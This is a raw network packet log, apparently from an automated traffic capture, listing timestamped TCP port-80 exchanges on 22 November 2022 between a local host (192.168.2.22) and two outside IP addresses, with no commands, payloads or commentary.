                                                                                Nov 22, 2022 05:09:07.447138071 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.447180986 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.447223902 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.447232008 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.447298050 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.448894024 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.448981047 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.449023008 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.449048996 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.449069023 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.449146032 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.450702906 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.450747967 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.450790882 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.450808048 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.450836897 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.450905085 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.617831945 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.617894888 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.617939949 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.617986917 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.618017912 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.618030071 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.618077040 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.618087053 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.618120909 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.618146896 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.618165016 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.618230104 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.619474888 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.619544983 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.619599104 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.619643927 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.619659901 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.619750977 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.620696068 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620743990 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620784998 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620827913 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620829105 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.620871067 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620898962 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.620913982 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620960951 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.620985985 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.621002913 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.621046066 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.621066093 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.621089935 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.621134043 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.621150017 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.621180058 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.621243954 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.622519970 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.622591019 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.622643948 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.622680902 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.622704029 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.622757912 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.937488079 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.937488079 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:08.115309000 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:08.115358114 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:08.391273022 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:08.603615046 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:09.154316902 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.308908939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.309062004 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.310182095 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.464615107 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465435982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465481997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465524912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465548038 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.465565920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465606928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465672016 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.465745926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465794086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465886116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.465939999 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.465961933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.466094017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.466208935 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.619993925 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620058060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620096922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620136023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620176077 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620189905 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.620214939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620246887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620277882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620301008 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.620359898 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.620393038 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620522976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620564938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620621920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.620624065 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.620739937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.621969938 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.774761915 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.774822950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.774863958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.774914980 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.774965048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775007963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775048018 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775070906 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.775088072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775129080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775168896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775188923 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.775209904 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775333881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775388002 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.775410891 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775487900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775527954 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775582075 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.775702953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775743008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775913954 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.775969028 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.776021004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929398060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929466009 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929507017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929548025 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929548025 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.929589033 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929630041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929668903 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.929672003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929792881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929856062 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.929868937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.929997921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930038929 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930063963 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.930144072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930183887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930243015 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.930320024 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930397034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930522919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930579901 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930587053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.930681944 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930740118 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.930805922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930845976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.930902004 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.930962086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.931041002 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.931097984 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:09.931104898 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.931243896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:09.931301117 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.083877087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.083934069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.083973885 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084013939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084019899 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084053040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084094048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084116936 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084219933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084261894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084315062 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084345102 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084429026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084481001 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084570885 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084611893 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084670067 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084688902 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084731102 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084861994 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.084878922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084918976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.084999084 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.085069895 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085110903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085182905 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.085230112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085311890 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085396051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085460901 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085529089 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.085566044 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.085577011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085618019 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085669994 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.085694075 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085781097 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.085992098 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086045980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086055040 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.086087942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086164951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086215019 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.086270094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086349964 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086400986 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.086464882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086540937 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.086699963 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.238409996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238471031 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238523960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238555908 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.238571882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238620043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238637924 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.238671064 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238718987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238761902 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.238765001 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238814116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238822937 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.238961935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.238995075 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239026070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239033937 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.239078999 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.239165068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239223003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239280939 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.239347935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239455938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239504099 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239538908 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.239644051 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239692926 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.239696026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239901066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239953995 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.239969969 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240051031 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240112066 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240143061 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240329981 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240386963 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240395069 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240436077 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240488052 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240493059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240539074 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240591049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240605116 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240685940 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.240751028 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.240781069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241472960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241512060 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241549015 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.241579056 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241610050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241641045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241643906 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.241672993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241703987 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241705894 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.241735935 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241763115 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.241766930 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241801023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241833925 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.241862059 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.242074013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242105961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242136955 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242141008 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.242168903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242196083 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.242199898 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242233038 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242275000 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.242440939 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242475033 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.242541075 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393084049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393168926 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393219948 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393228054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393284082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393299103 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393342018 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393395901 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393399000 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393450975 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393508911 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393512964 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393574953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393625975 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393654108 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393778086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393831968 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393841028 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.393884897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.393939972 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.394002914 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394057989 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394114017 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.394154072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394208908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394264936 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.394345999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394440889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394495010 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394499063 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.394591093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394653082 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.394685984 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394740105 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394794941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.394799948 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395004034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395082951 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395102024 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395159006 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395212889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395221949 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395265102 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395320892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395368099 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395472050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395534039 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395567894 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395622969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395683050 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395761967 CET8049175183.78.168.24192.168.2.22
